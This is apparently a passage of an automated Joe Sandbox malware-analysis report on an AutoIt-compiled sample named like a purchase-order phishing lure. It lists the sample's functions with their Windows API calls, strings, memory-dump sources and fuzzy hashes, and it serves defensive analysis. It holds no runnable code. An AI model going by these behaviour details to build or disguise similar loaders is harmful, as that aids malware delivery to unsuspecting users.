API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 87d0efc2a200e611afc57662db2d9fe5074bb5fa0814b132d49e4943f5861427
Instruction ID: 6fc82eccf78ee3bbffcc202bd0bda0f016539c707d5aa7d19e764feb260bae21
Opcode Fuzzy Hash: 87d0efc2a200e611afc57662db2d9fe5074bb5fa0814b132d49e4943f5861427
Instruction Fuzzy Hash: E7212AB4D00304AFDB40DFAAEC45E99BFF5FB49314F14853AE214A22B2D77946508B99

Function 0042ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0042ACC1

Part of subcall function 00427CF4: __mtinitlocknum.LIBCMT ref: 00427D06
Part of subcall function 00427CF4: EnterCriticalSection.KERNEL32(00000000,?,00427ADD,0000000D), ref: 00427D1F

__calloc_crt.LIBCMT ref: 0042ACD2

Part of subcall function 00426986: __calloc_impl.LIBCMT ref: 00426995
Part of subcall function 00426986: Sleep.KERNEL32(00000000,000003BC,0041F507,?,0000000E), ref: 004269AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0042ACED
GetStartupInfoW.KERNEL32(?,004B6E28,00000064,00425E91,004B6C70,00000014), ref: 0042AD46
__calloc_crt.LIBCMT ref: 0042AD91
GetFileType.KERNEL32(00000001), ref: 0042ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0042AE11

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 2c9eff342a85ee14410e3b23e10e55eeced261fa2f51718b9a05f3e09e174de4
Instruction ID: 1e7d97e7c38c6da714d1d657cfbdde346f06c9dd53f7923aedc6dd297c817baf
Opcode Fuzzy Hash: 2c9eff342a85ee14410e3b23e10e55eeced261fa2f51718b9a05f3e09e174de4
Instruction Fuzzy Hash: 23810A70A013618FCB14CF68D94059EBBF0AF05324B65426FD8A6AB3D1C73C9813CB5A

Function 00C118E8 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C1192D

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: d31f2858f9865614f773d73b334813334762b1d74b937795d8a04388b7054a1a
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: CF510D75A50209FBDF20DFA0CC59FEE7B78AF48701F108554FB19EA180DA749A84EB60

Function 004049FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00404A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004741DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0047421A
RegCloseKey.ADVAPI32(?), ref: 00474249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00404A13
Include, xrefs: 004741D3, 00474212

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 6e2642f92ac6b630ee04a3de7f9ccbad1b1158d06de569f2c8570250353f6bad
Instruction ID: 24367ca1c3048aa5880316b58277e600b20755b5d821188449d38961baa88e0d
Opcode Fuzzy Hash: 6e2642f92ac6b630ee04a3de7f9ccbad1b1158d06de569f2c8570250353f6bad
Instruction Fuzzy Hash: D6116071A01109BEEB04ABA4CD86EFF7BACEF45348F10446AB506E7191EB745E01DB58

Function 004036B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004036E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403707
ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 0040371B
ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 00403724

Strings

edit, xrefs: 00403701
AutoIt v3, xrefs: 004036DE, 004036E3, 004036E4

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 5d8e0124634df2f6e3b1d57e41c7542da14dc5e0961a2e3f2bc33fd230573aeb
Instruction ID: 4d08d86da7aa94d300ca7f7225cc14ad318fbe6330d37f8c56b478b09d34b1b0
Opcode Fuzzy Hash: 5d8e0124634df2f6e3b1d57e41c7542da14dc5e0961a2e3f2bc33fd230573aeb
Instruction Fuzzy Hash: 57F0FE719402D07AEB715767AC48E773E7DEBC7F20F00403FBA04A25B1C66508A5DAB8

Function 00404A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C1148,?,004061FF,?,00000000,00000001,00000000), ref: 00405392

Part of subcall function 004049FB: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00404A1D

_wcscat.LIBCMT ref: 00472D80
_wcscat.LIBCMT ref: 00472DB5

Strings

\, xrefs: 00472DA2
\Include\, xrefs: 00404B0A
8!L, xrefs: 00404B1C

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!L$\$\Include\
API String ID: 3592542968-1316215114
Opcode ID: ed96d8d4dc5fc6f79d675eabc9ed72eb954c5a6136f35b35f00c8d5d0e0da28e
Instruction ID: 69193c1904a342b4ff2347d59ce207587477678b7e20525fd4ba8b54dc9425ab
Opcode Fuzzy Hash: ed96d8d4dc5fc6f79d675eabc9ed72eb954c5a6136f35b35f00c8d5d0e0da28e
Instruction Fuzzy Hash: ED514CB54043409FC754EF56EA818AAB7F4BA49304B48453FF649A32A1DFF89608CB5E

Function 00404139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 004041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004039FE,?,00000001), ref: 004041DB

_free.LIBCMT ref: 004736B7
_free.LIBCMT ref: 004736FE

Part of subcall function 0040C833: __wsplitpath.LIBCMT ref: 0040C93E
Part of subcall function 0040C833: _wcscpy.LIBCMT ref: 0040C953
Part of subcall function 0040C833: _wcscat.LIBCMT ref: 0040C968
Part of subcall function 0040C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0040C978

Strings

Bad directive syntax error, xrefs: 004736E4
>>>AUTOIT SCRIPT<<<, xrefs: 00473491

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 3f6e2781b3b70428434a1c9947f3fbeb67486eeecc21cf739d6f0ac104d136f1
Instruction ID: a5069b7475330fe088817bec80de3aee8e84fa7b19bb18b6e651e427e71290f0
Opcode Fuzzy Hash: 3f6e2781b3b70428434a1c9947f3fbeb67486eeecc21cf739d6f0ac104d136f1
Instruction Fuzzy Hash: 91916071910219AFCF14EFA5CC919EEB7B4BF14314F10842FF415AB291DB38AA45DB98

Function 00C13388 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 159fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C13278: Sleep.KERNEL32(000001F4), ref: 00C13289

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C134CF

Strings

IZDGWEHAGJZJQ1EEEP4L9, xrefs: 00C1354F, 00C13552

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CreateFileSleep
String ID: IZDGWEHAGJZJQ1EEEP4L9
API String ID: 2694422964-2185050280
Opcode ID: a3c6485b9c9b50a525f5939a36d59b6111498a6ecad70bdca42a349d86d3063e
Instruction ID: 7aaf8f9e28663835785354e8e03f50cef95eb214bbe243960e9425e208639538
Opcode Fuzzy Hash: a3c6485b9c9b50a525f5939a36d59b6111498a6ecad70bdca42a349d86d3063e
Instruction Fuzzy Hash: D9619070D04288DBEF11DBA4C855BEEBBB5AF19304F104598E208BB2C1D6B91F85DB66

Function 004040E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00473725
GetOpenFileNameW.COMDLG32 ref: 0047376F

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

Part of subcall function 004040A7: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004040C6

Strings

t3K, xrefs: 00473745
X, xrefs: 0047373E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3K
API String ID: 3777226403-2811000538
Opcode ID: b93b0c1c5738115443a6aa44457fd713ed33a969696249c1967a6bebbd69b3da
Instruction ID: 9ad05c4a51ad5a7aed7e064f7d04d0a32a4adfcb21fa2545d4e7afce16479d8e
Opcode Fuzzy Hash: b93b0c1c5738115443a6aa44457fd713ed33a969696249c1967a6bebbd69b3da
Instruction Fuzzy Hash: C62196B1A101989BCB01DF95D845BDE7BF89F89305F00806FE505BB281DBBC5A898F69

Function 004234AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 004234FE

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00423539
__wopenfile.LIBCMT ref: 00423549

Strings

<G, xrefs: 004234CD, 004234F0, 004234FC

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: e12d3699157ed522373a9c6598b4b5b430320c1e0cdd8312ea3d440cb485dafa
Instruction ID: 89deda876913a1a8087184d99beb7911a355133d9146999c29091959b336447a
Opcode Fuzzy Hash: e12d3699157ed522373a9c6598b4b5b430320c1e0cdd8312ea3d440cb485dafa
Instruction Fuzzy Hash: 3A113D70B00235ABDB11BF73BC4266F36B4AF05354B95895BE414C7281EB3CCA419779

Function 0041D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0041D28B,SwapMouseButtons,00000004,?), ref: 0041D2BC
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0041D28B,SwapMouseButtons,00000004,?,?,?,?,0041C865), ref: 0041D2DD
RegCloseKey.ADVAPI32(00000000,?,?,0041D28B,SwapMouseButtons,00000004,?,?,?,?,0041C865), ref: 0041D2FF

Strings

Control Panel\Mouse, xrefs: 0041D2BA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
Instruction ID: 0cd1190555930828b12ec140491f6cbda27ebd5e95af48670a4612518318c08c
Opcode Fuzzy Hash: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
Instruction Fuzzy Hash: EC117CB5A11208BFDB118F64CC84EEF7BB8EF05744F10486AE801D7250D735AE819B68

Function 0044C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00404517: _fseek.LIBCMT ref: 0040452F

Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C65D
Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C670

_free.LIBCMT ref: 0044C4DD
_free.LIBCMT ref: 0044C4E4
_free.LIBCMT ref: 0044C54F

Part of subcall function 00421C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00427A85), ref: 00421CB1
Part of subcall function 00421C9D: GetLastError.KERNEL32(00000000,?,00427A85), ref: 00421CC3

_free.LIBCMT ref: 0044C557

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction ID: 674951708a286eb07b9171a8a69b16656f8ff281423f2ed36709ed89db711628
Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction Fuzzy Hash: 7E515FF5A04218AFDB149F65DC81AADBBB9EF48304F1000AEB219A3291DB755A80CF5D

Function 00ABB180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00ABB2BA
WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00ABB2E0

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: ca23d33e3a35d6ef056f07b59244ea535e45da3e15897ebf72c84674a1887985
Instruction ID: 93643cced9f91080fec79f46c848d5cb74045fbf82b49f2cd43a27b4dbbd6f94
Opcode Fuzzy Hash: ca23d33e3a35d6ef056f07b59244ea535e45da3e15897ebf72c84674a1887985
Instruction Fuzzy Hash: 0D31817042C380AED7119B6988157FFBFE8AB92714F48864DE4D88A693D3F488089773

Function 0041EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041EBB2

Part of subcall function 004051AF: _memset.LIBCMT ref: 0040522F
Part of subcall function 004051AF: _wcscpy.LIBCMT ref: 00405283
Part of subcall function 004051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00405293

KillTimer.USER32(?,00000001,?,?), ref: 0041EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0041EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00473C88

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: df4f371beef39f263f04c1f7b813fdb3b3131aef762958de6741ae884a2b81f1
Instruction ID: b49518ba9000ce9ca09009b9798321fdbb3bf5267274904d3eb6e3e3661bd638
Opcode Fuzzy Hash: df4f371beef39f263f04c1f7b813fdb3b3131aef762958de6741ae884a2b81f1
Instruction Fuzzy Hash: 3521DD759057949FE7339B248C55FE7BFEC9B01308F04045ED68E66282D3781A858B5A

Function 00C11FC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00C1200D
ExitProcess.KERNEL32(00000000), ref: 00C1202C

Strings

D, xrefs: 00C11FD9

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction ID: 068121be79b00b8837a5165e919ac0997354da939e891e7dc16e44e105740d3f
Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction Fuzzy Hash: 68F04F7550024CABDB20EFE0CC49FEE777DBF08701F408508FB0A9A184DA7496489B61

Function 0044C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0044C72F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0044C746

Strings

aut, xrefs: 0044C740

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3d2e6316c8f3a47ad6dc190deda9ae84468cfd82ede16fcca1fefbdffebd8a43
Instruction ID: 208516855a03f89cd35dcfacd4225edbf1aaece69b415c0056d3480ee9c56843
Opcode Fuzzy Hash: 3d2e6316c8f3a47ad6dc190deda9ae84468cfd82ede16fcca1fefbdffebd8a43
Instruction Fuzzy Hash: 81D05E7190030EBBDB10AB94DC0EFCA776C9700704F0005A17650A50F1DAB4E6998B69

Function 0045F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed629ad32a379d639f331eff032c05424b95fb1a9cffe0e5a96631345af4bda
Instruction ID: b3827f22a9b40117375a449595afde1625f4abf3f7e4d7e9dd60fbd75d6536de
